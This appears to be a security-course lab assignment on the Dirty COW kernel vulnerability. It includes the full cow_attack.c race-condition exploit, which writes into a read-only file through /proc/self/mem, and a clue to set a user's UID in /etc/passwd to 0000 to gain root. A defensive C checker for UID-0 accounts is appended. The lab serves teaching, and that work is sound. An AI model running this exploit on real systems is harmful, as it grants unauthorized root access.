Question
(Using SEEDUbuntu12.04)
In this assignment you should turn this normal user into a root user using the Dirty COW attack.
Adding a new account can be achieved using the adduser command. After the account is created, a new record will be added to /etc/passwd. See the following: $ sudo adduser
We suggest that you save a copy of the /etc/passwd file just in case you make a mistake and corrupt this file.
Clue: You need to modify the new user's entry in /etc/passwd, so the third field is changed to 0000. The file is not writable to the new user, but we can use the Dirty COW attack to write to this file. You shall modify the cow_attack.c to achieve this goal. If your attack is successful, you will be able to notice something unusual and interesting when you switch user to user:
cow_attack.c file
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <sys/stat.h>
#include <string.h>
#include <unistd.h>

void *map;
void *writeThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char *argv[])
{
  pthread_t pth1,pth2;
  struct stat st;
  int file_size;

  // Open the target file in the read-only mode.
  int f=open("/zzz", O_RDONLY);

  // Map the file to COW memory using MAP_PRIVATE.
  fstat(f, &st);
  file_size = st.st_size;
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);

  // Find the position of the target area
  char *position = strstr(map, "222222");

  // We have to do the attack using two threads.
  pthread_create(&pth1, NULL, madviseThread, (void *)file_size);
  pthread_create(&pth2, NULL, writeThread, position);

  // Wait for the threads to finish.
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}

void *writeThread(void *arg)
{
  char *content= "******";
  off_t offset = (off_t) arg;

  int f=open("/proc/self/mem", O_RDWR);
  while(1) {
    // Move the file pointer to the corresponding position.
    lseek(f, offset, SEEK_SET);
    // Write to the memory.
    write(f, content, strlen(content));
  }
}

void *madviseThread(void *arg)
{
  int file_size = (int) arg;
  while(1){
    madvise(map, file_size, MADV_DONTNEED);
  }
}
You need to submit a detailed lab report to describe what you have done and what you have observed. Include a brief explanation of the cow_attack.c code used in both exercises. Please provide details using screenshots and code snippets. You also need to provide an explanation of the observations that are interesting or surprising.
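A defensive check for the outcome the clue describes, as an added example that is not part of the original question or the lab's code: it scans passwd-format text for accounts other than root whose UID field evaluates to 0, comparing numerically so that `0000` is caught as well as `0`. The account name `labuser`, the sample lines and the function names are constructed for illustration.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Constructed sample in /etc/passwd format; "labuser" is a made-up name. */
static const char SAMPLE[] =
    "root:x:0:0:root:/root:/bin/bash\n"
    "seed:x:1000:1000:seed,,,:/home/seed:/bin/bash\n"
    "labuser:x:0000:1002:,,,:/home/labuser:/bin/bash\n";

/* 1: non-root account with UID 0; 0: other valid entry; -1: malformed. */
int is_shadow_root(const char *line)
{
    char buf[512] = {0}, *fields[7], *p = buf, *end;
    size_t len = strcspn(line, "\n");
    int n = 0;
    if (len >= sizeof(buf)) return -1;
    memcpy(buf, line, len);
    /* Split on ':' by hand; strtok() would skip empty fields. */
    while (n < 7) {
        fields[n++] = p;
        if ((p = strchr(p, ':')) == NULL) break;
        *p++ = '\0';
    }
    if (n != 7) return -1;
    /* Compare numerically: "0000" and "0" are the same UID. */
    errno = 0;
    long uid = strtol(fields[2], &end, 10);
    if (errno || end == fields[2] || *end != '\0') return -1;
    return uid == 0 && strcmp(fields[0], "root") != 0;
}

/* Counts flagged entries in newline-separated passwd text. */
int count_shadow_roots(const char *text)
{
    int hits = 0;
    while (*text) {
        if (is_shadow_root(text) == 1) hits++;
        text += strcspn(text, "\n");
        if (*text == '\n') text++;
    }
    return hits;
}

int main(void)
{
    printf("%d non-root UID 0 account(s)\n", count_shadow_roots(SAMPLE));
    return 0;
}
```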